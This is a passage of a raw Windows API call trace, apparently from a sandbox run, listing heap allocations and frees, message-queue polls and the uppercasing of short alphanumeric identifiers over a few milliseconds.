[0151.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4d1e) returned 0x2a9ee68 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4d1e) returned 0x2a9a140 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9a140 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0151.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0151.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0151.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0151.739] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0151.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0151.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4d1e) returned 0x2a9a140 [0151.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0151.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa108 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0151.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0151.740] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4d1e) returned 0x2aaf410 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0151.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0151.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0151.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0151.741] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0151.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0151.742] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0151.742] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0151.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.743] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0151.743] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0151.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0151.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0151.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0151.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0151.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0151.744] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0151.745] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0151.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa180 [0151.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0151.746] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0151.746] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0151.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2b8 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0151.747] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0151.747] HeapFree (in: 